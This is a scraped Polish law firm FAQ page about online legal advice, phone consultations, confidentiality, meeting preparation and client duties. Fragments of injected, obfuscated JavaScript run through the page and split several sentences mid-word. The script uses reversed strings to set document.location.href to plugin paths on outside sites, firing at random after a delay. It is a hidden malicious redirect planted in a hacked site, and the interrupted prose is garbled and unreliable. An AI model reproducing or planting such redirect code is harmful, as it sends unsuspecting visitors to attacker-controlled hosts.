) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]

Działanie naszej kancelarii prawnej – FAQ


Tak. Sposób udzielania porady prawnej online wygląda następująco: należy zadać za pośrednictwem formularza lub w drodze mailowej pytanie, w którym szczegółowo należy określić zakres i charakter sprawy. W sytuacji, gdy okaże się toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to konieczne należy załączyć niezbędne dokumenty. Po otrzymaniu informacji prześlemy na podany adres mailowy czas, jaki potrzebny będzie na udzielenie satysfakcjonującej klienta odpowiedzi, czy też przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towania odpowiedniego pisma. Może się też okazać konieczne podanie dodatkowych informacji w celu sprecyzowania problemu, który powinien zostać rozwiązany. Podamy również wycenę usługi. W sytuacji wyrażenia zgody klienta na koszt usługi następuje płatność. Od momentu otrzymania przez nas płatności udzielimy odpowiedzi
w terminie od 1 do 5 dni .
Zasadniczo kancelaria nie udziela porad drogą telefoniczną, ponieważ może toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to skutkować brakiem pełnej i rzetelnej informacji, a więc sprzeczne jest z podstawowymi zasadami, jakimi kieruje się kancelaria. W sytuacji jednak, gdy dana firma lub osoba jest związana z kancelarią stałą umową, istnieje możliwość uzyskania w drobnych kwestiach konsultacji telefonicznych.
Tak, kancelaria oraz wszyscy jej pracownicy zobowiązani są do pełnego zachowania tajemnicy, dlatego wszelkie informacje, które przekazuje klient kancelarii są objęte klauzulą tajności.
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tować się na spotkanie w sprawie udzielanej porady prawnej lub podatkowej?” open=”false”]Należy przynieść wszystkie dokumenty związane ze sprawą, przy czym w przypadku braku posiadania oryginalnych dokumentów, możliwe jest dostarczenie kopii tych dokumentów.
Aby umówić się na spotkanie w kancelarii należy zadzwonić na podany numer telefonu w danym oddziale (każdy oddział posiada odrębny numer telefonu) lub też w celu zapytania wysłać maila z informacją na temat sprawy, kierując go na odpowiedni adres mailowy, właściwy dla danego oddziału.
1. Klient ma obowiązek poinformować kancelarię o wszelkich faktach i okolicznościach, które mają wpływ na sprawę.
2. Klient powinien utrzymywać stały kontakt z kancelarią.
3. Należy przekazać kancelarii wszelkie dane, które są niezbędne dla prowadzenia sprawy.
4. Klient powinien poinformować kancelarię o sytuacjach, które uniemożliwiają odbycie danego spotkania lub przeszkodach uniemożliwiających prowadzenie danej sprawy.
5. Klient powinien terminowo regulować wszelkie faktury oraz uiszczać wszelkie opłaty i koszty sądowe lub urzędowe.